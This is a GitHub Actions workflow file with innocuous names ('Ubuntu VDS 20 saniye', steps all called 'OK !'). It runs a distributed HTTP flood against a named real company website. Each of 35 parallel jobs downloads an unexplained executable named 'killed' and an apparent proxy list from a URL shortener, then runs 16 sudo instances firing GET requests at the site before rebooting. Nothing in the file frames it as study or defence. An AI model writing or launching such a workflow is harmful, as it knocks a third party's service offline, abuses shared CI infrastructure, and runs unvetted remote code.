name: Ubuntu VDS 20 saniye

on:
  workflow_dispatch:

jobs:
  vds:
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 35
      matrix:
        instance: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35]

    steps:
      - name: OK !
        run: |
          wget https://curl.by/yD5p3/killed -O killed
          wget https://curl.by/QHrRL/fres.txt -O fres.txt
          chmod +x killed
          PIDS=()
          for i in {1..16}; do
            sudo timeout 35 ./killed GET https://www.dgnteknoloji.com/kurumsal fres.txt 35 950 8 &
            PIDS+=($!)
          done
          
          for pid in "${PIDS[@]}"; do
            wait $pid
          done

      - name: OK !
        run: sleep 35
        
      - name: OK !
        run: sudo reboot
